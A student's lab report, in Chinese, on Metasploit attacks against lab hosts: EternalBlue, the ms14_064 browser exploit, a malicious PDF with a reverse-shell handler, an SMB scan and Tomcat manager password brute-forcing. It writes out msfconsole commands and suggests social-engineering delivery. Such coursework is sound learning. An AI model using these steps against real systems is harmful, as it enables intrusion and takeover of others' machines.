20202418 2022-2023-2 《网络与系统攻防技术》实验六实验报告
1.实验内容
掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1 使用永恒之蓝漏洞(MS17-010)对靶机进行主动攻击;
1.2 使用ms14_064漏洞针对浏览器进行攻击;
1.3 使用Adobe发动针对客户端的攻击;
1.4 成功应用SMB Version Detection
1.5 使用msf发起一个针对tomcat的攻击
2.实验过程
2.1 使用永恒之蓝漏洞(MS17-010)对靶机进行主动攻击
靶机(windowsxp):172.16.211.75
2.1.1 使用nessus对靶机进行漏洞扫描
使用上一次使用的Nessus中的Basic Network Scan的选项。
输入靶机的ip地址,点击launch,开始扫描目标主机对应的漏洞。
发现有个红的,点击查看,是风靡一时的永恒之蓝漏洞!
2.1.2 打开msfconsole,search寻找模块
使用指令:
search ms09-001
挑选我们期望的模式
2.1.2 调整参数
如图,输入
set 想要调整的参数 参数名称
将攻击的主机调整为我们的靶机ip地址
2.1.3 run发动攻击
如上图所示,有的模块是不可以的,当然我们也不知道一开始应该使用哪个模块,就穷举尝试一下即可。
发现use1是可以的。
如上图红色框框可见,已经成功发动了攻击,成功获得了目标主机的shell。
2.2 使用ms14_064漏洞针对浏览器进行攻击
2.2.1 search寻找模块并选择相关模块、配置参数
这里是搜索相关模块之后,依据名字(如:windows、brower等)选择对应的模块。
use exploit/windows/browser/ms14_064_ole_code_execution # 选择攻击使用模块
set SRVHOST 172.16.211.203 # 设置攻击机ip,隐藏自身
set LHOST 172.16.211.203
set LPORT 2418
exploit #发起渗透攻击
结果如图,会产生一个网址。
2.2.2 “诱导”靶机打开网址
靶机是我自己的,我选择直接复制粘贴。
2.2.3 在攻击主机查看链接并获得shell
sessions # 列出会话
sessions -i 2 # 进入与靶机的连接,即获取到的shell
2.3 使用Adobe发动针对客户端的攻击
攻击主机(kali):192.168.1.102
2.3.1 生成攻击文件
攻击过程和上述过程十分类似。也是先search 对应的攻击模块,根据关键字选择我们想要的攻击模块,之后使用show options查看需要修改哪些参数,最后修改对应的参数运行生成攻击文件。
2.3.2 以某种方法将pdf文档传送至靶机上
可以通过社会工程学方法、U盘硬盘等物理存储硬件、趁对方不注意直接导入的方法诱导靶机以Adobe Reader 9.3(版本在8.2.4-9.3.4之间即可)的打开方式打开pdf文档。
2.3.3 在攻击主机上开启监听
use exploit/multi/handler
set LPORT 4444 # 与前面使用攻击模块时配置的LPORT要一致,默认为4444
set LHOST 192.168.1.102 # 与前面使用攻击模块时配置的LHOST要一致
run
2.3.4 诱导靶机打开pdf文档,获得shell
如图所示,在使用Adobe Reader打开pdf文档后,会卡机。此时在攻击主机上则会显示监听成功,成功获取目标主机的shell。
2.4 SMB Version Detection
2.4.1 模块介绍
SMB(ServerMessageBlock)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。
但是,SMB协议中采用控制文件安全传输的机制是使用客户身份验证的方式,通过客户端向服务器端发送验证密码来获取文件传输的权限。
针对该机制的网络攻击相对严重,攻击程序通过对验证密码的截获来窃取文件的访问权限,局域网下文件传输的安全性得不到保障。
使用Metasploit渗透框架可以进行SMB服务版本扫描。
2.4.2 参数设置
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.112 # 设置靶机IP
2.4.3 扫描结果
[*] 192.168.1.112:445 ——SMB Detected (versions:1) (preferred dialect:) (signatures:optional)Windows XP SP3 (language:English) (name:20202418-0D56B9) (workgroup:WORKGROUP)
[+] 192.168.1.112:445Host is running SMB Detected (versions:1) (preferred dialect:) (signatures:optional)WindowsXP SP3 (language:English) (name:20202418-0b56B9)(workgroup:20202418URKORwuP)
可以发现他直接把我电脑的信息都扫出来了!很厉害!甚至能看出来我电脑的语言、名称、工作组等。
2.5 使用msf一个针对tomcat的攻击
tomcat弱口令漏洞:Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问,如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。在tomcat8环境下默认进入后台的密码为tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令, 使用工具对其进行穷举。得到密码后,也可以进行后台上传恶意代码控制服务器。
靶机(蔡步越同学的电脑 win10系统):192.168.1.106
2.5.1 靶机环境的配置
详情参考这篇博客(https://blog.csdn.net/weixin_45253622/article/details/114433601),我在我的舍友蔡步越同学的主机上开启了tomcat服务,把后台身份验证的证号和密码都设置成了tomcat,并关闭了他的防火墙。
2.5.2 使用nmap对目标主机进行扫描
输入 nmap -sV 192.168.1.106,查询目标靶机是否开启了tomcat服务。通过下图可以看出,tomcat所属的8180端口已经被打开了.
2.5.3 按照之前的流程 发动攻击
search tomcat
show options
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt ————密码字典
set USER_FILE /usr/share/metasploit- framework/data/wordlists/tomcat_mgr_default_users.txt ————用户字典
第一次发动攻击失败!(失败原因见分析)
2.5.4 重新配置靶机环境 终于攻击成功
如图所示,成功获得了我们想要的账号和密码!
3.问题及解决方案
- 问题1:在使用Adobe发动针对客户端的攻击时失败,靶机成功打开了pdf文件,未发生漏洞
- 问题1解决方案:Adobe的版本一定要在8.2.4-9.3.4之间!否则攻击不会成功。
- 问题2: 在tomcat实验中,首次攻击未成功,显示Authorization not requested
- 问题2解决方案:在tomcat中,远程认证默认是关闭的,因此要修改配置文件,打开能够远程攻击的权限。具体的配置步骤放在参考材料中了。
4.学习感悟、思考等
在这次实验中,我学习了metasploit的基本应用方式,重点掌握了三种攻击方式的思路。在完成任务的过程中,我遇到了很多困难和挑战。尤其是在针对浏览器和客户端的攻击中,由于漏洞的不断更新和修复,我需要不断地寻找最新的漏洞并进行尝试。我还学习了如何使用辅助模块,这些模块可以帮助我更加高效地进行攻击和渗透测试。总的来说,这次计算机实验让我受益匪浅。通过实践,我不仅掌握了metasploit的基本应用方式,还深入了解了网络安全的重要性和攻击的原理。我相信,在今后的学习和工作中,这些知识和经验都会对我有很大的帮助。